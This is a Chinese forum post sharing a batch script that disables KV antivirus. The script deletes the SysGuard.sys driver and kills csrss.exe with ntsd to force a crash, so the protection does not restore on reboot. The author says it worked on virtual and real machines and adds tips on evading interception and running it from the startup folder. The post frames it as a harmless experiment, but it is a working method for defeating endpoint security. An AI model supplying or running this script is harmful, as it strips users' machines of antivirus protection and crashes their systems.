很XX,高手飘过...
今早起来一边早饭一边试验的。代码见下:
@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找进程%app_name%,准备死机...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%
原理我自己也不是太明白就不多说了,实验结果好像管用,我用虚拟机和真实机都分别试验了下,还不错。直接点的批处理脚本,如果转成EXE效果不保证了(没有实验)。但是由于有关机回写,必须强迫死机,虽然重启后KV的变态进程守护不管用了(可以用任务管理器试试),但是在重启之前你还得把善后工作做好,准备来日重生。有几点得注意:
1、不能直接用批处理写注册表(虽然可以还原SSDT之后用API写,但是不是我们追求的纯粹R3手段)
2、最好不要把bat放在EXE里,因为运行时KV十有八九可以拦截到
3、最好的地方可能是启动文件夹,或许还有些其他修改手段
的确是个很娱乐且没有什么实用价值的手段...大家可以娱乐下,不过考虑到每个人的机子效果或许不同,不用报有太大希望。
特别强调:KV08/09用户,试验时一定要把C:\Windows\system32\drivers\SysGuard.sys拷贝个到其它地方备份,如果本实验真的成功了,KV就实效了。只有拷贝回去下次重启即可恢复,或者重新安装。
【编辑推荐】
